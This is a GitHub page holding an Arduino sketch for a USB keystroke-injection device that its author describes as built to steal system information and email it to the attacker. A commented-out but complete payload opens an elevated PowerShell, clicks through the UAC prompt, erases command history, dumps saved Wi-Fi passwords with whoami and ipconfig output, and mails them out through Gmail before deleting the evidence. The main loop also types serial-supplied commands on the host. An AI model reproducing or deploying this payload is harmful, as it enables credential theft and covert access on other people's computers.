-
Notifications
You must be signed in to change notification settings - Fork 0
/
mailduck.ino
174 lines (163 loc) · 7.5 KB
/
mailduck.ino
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
/*
* Created by ryspom, to get valuable system information and send it back to the attackers email.
* It should work with windows 7, but it is only tested on windows 10 machines(works perfect!)
*/
#include "Keyboard.h"
void typeKey(int key)
{
Keyboard.press(key);
delay(50);
Keyboard.release(key);
}
void command(char command[])
{
Keyboard.print(command);
typeKey(KEY_RETURN);
}
void openWindowsMenu(){
Keyboard.press(KEY_LEFT_CTRL);
delay(80);
Keyboard.press(KEY_ESC);
delay(80);
Keyboard.releaseAll();
delay(1000); // wait for quick windows menu to load
}
void twoKeyCombination(char key1[],char key2[]){
Keyboard.press(key1);
delay(50);
Keyboard.press(key2);
delay(50);
Keyboard.releaseAll();
}
void threeKeyCombination(char key1[],char key2[], char key3[]){
Keyboard.press(key1);
delay(50);
Keyboard.press(key2);
delay(50);
Keyboard.press(key3);
delay(50);
Keyboard.releaseAll();
}
void moveWindowOffScreen(){
//enter the window manipulation menu
Keyboard.press(KEY_LEFT_ALT);
delay(80);
Keyboard.write(0x20); // ascii code for space bar. Not a modifier key, so we use .write()
delay(80);
Keyboard.releaseAll();
// choose M(stands for Move) and use arrows to move the CMD window off screen
Keyboard.write('m'); // NOTE: there is no need for pressing the Return key. By pressing "M", the option is automatically selected
delay(100); // wait for the window to enter "move" mode
Keyboard.press(KEY_LEFT_ARROW);
delay(4000); // we want enough delay for the window to go off screen
Keyboard.releaseAll();
typeKey(KEY_RETURN);
delay(300);
}
void blinkLed(){
digitalWrite(2,HIGH);
delay(300);
digitalWrite(2,LOW);
delay(300);
}
/* Init function */
void setup()
{
pinMode(A2, INPUT); // Added a pushbutton at pin A2(connected to GND with 10KOhm pulldown resistor and VCC)
pinMode(2,OUTPUT); // added a LED for output
Serial1.begin(115200); // Serial1 MUST be used(instead of Serial. This is a leonardo specific requirement)
Serial.begin(115200); // Debug Serial to be used from PC connected with usb cable
if(digitalRead(A2)==LOW){ // if the key is pressed, the value is HIGH and the script doesnt run!
// Begining the Keyboard stream
/*
Keyboard.begin();
delay(2000);
int guiKey1 = 131; // Library code for GUI key(windows/osx button)
int guiKey2 = 114; // Ascii code for r
twoKeyCombination(guiKey1,guiKey2); // open "run" dialog
command("powershell Start-Process powershell -Verb runAs");
delay(1500); // wait for the powershell to open
Keyboard.press(KEY_LEFT_ALT); // reply yes to User Account Control Screen
Keyboard.press('y');
Keyboard.releaseAll();
delay(300);
typeKey(KEY_RETURN);
delay(2000); // wait untill the system recognises y is not a command, or until powershell opens
//moveWindowOffScreen();
command("$SMTPServer = 'smtp.gmail.com'");
command("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)");
command("$SMTPInfo.EnableSsl = $true");
command("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('YOUR_EMAIL_USERNAME', 'YOUR_EMAIL_PASSWORD');");
command("$ReportEmail = New-Object System.Net.Mail.MailMessage");
command("$ReportEmail.From = 'YOUR_EMAIL_ADDRESS'");
command("$ReportEmail.To.Add(RECIPIENTS_EMAIL_ADDRESS')");
command("clear");
twoKeyCombination(KEY_LEFT_ALT,KEY_F7); // cmd and powershell history(commands) is erased with Alt+F7
command("$ReportEmail.Subject = 'Duck Machine Report'");
command("$ReportEmail.Body = 'Duck Email Successfully Sent from Rubber-Duckied PC!Check the attachments for system data/info.'");
command("echo \"This is a file automatically generated on the target pc by the ducky script.\" > reportfile.txt"); // signle > because we do not want to append, we want to create the file
command("echo \"whoami results:\" >> reportfile.txt");
command("whoami >> reportfile.txt");
command("echo \"WIFI PASSWORDS!\" >> reportfile.txt");
command("(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >> reportfile.txt");
//THE ABOVE ONE-LINER was found on https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Data-Exfiltration---Backdoor
command("echo \"ipconfig results\" >> reportfile.txt");
command("ipconfig >> reportfile.txt");
command("$ReportEmail.Attachments.Add('reportfile.txt')"); // dump every useful info in that file and attach it to the email
command("$SMTPInfo.Send($ReportEmail)");
command("del reportfile.txt"); // hide our tracks a bit, after powershell has exited -> email has been sent(can cause trouble)
command("exit");
*/
Keyboard.end();
}
}
/* Unused endless loop */
void loop(){
blinkLed();
if (Serial1.available() > 0) {
String serialstring = Serial1.readString(); // it can be 63 characters long MAX!
String typeOfCommand = serialstring.substring(0,3); // the first four letters indicate the type of the command(e.g. "wrt=")
String commandContent = serialstring.substring(4); // all the letters after the fourth
char commandContentChar[commandContent.length()];
commandContent.toCharArray(commandContentChar,(commandContent.length()+1)); // doesnt return anything, just copies the result in the first argument
int commandContentInt = commandContent.toInt(); // convert string to integer(long)
Serial.println("----------------------New Command----------------------");
Serial.print("serialstring=");
Serial.println(serialstring);
Serial.print("typeofcommand=");
Serial.println(typeOfCommand);
Serial.print("commandContent=");
Serial.println(commandContent);
Serial.print("commandContentChar=");
Serial.println(commandContentChar);
Serial.print("commandContentInt=");
Serial.println(commandContentInt);
if(typeOfCommand=="cmd"){ // command mode. Types a command and then presses the Return key
Keyboard.print(commandContent);
typeKey(KEY_RETURN);
}
else if(typeOfCommand=="prt"){ // print mode. Just prints the output wherever the cursor's at.
Keyboard.print(commandContent);
}
else if(typeOfCommand=="wrt"){ // write mode. Writes a single key, both a modifier and a letter/symbol one.
Keyboard.write(commandContentChar);
}
else if(typeOfCommand=="prs"){ // press mode. Presses a modifier Key(and does not release it until an rls comes.
Keyboard.press(commandContentInt); // accepts modifier key codes(see mailduck's readme.md) and ASCII codes
}
else if(typeOfCommand=="pr1"){ // press-and-then-release mode. Presses a modifier Key(and does not release it until an rls comes.
Keyboard.press(commandContentInt); // accepts modifier key codes(see mailduck's readme.md) and ASCII codes
delay(100);
Keyboard.release(commandContentInt);
}
else if(typeOfCommand=="rls"){ // release mode. Releases all the pressed modifier keys.
Keyboard.releaseAll();
}
else if(typeOfCommand=="dbg"){
//do nothing. "dbg" stands for Debug and it is to be used for debug of the nodeMCU through an USB
}
else{
Keyboard.print(serialstring);
}
}
}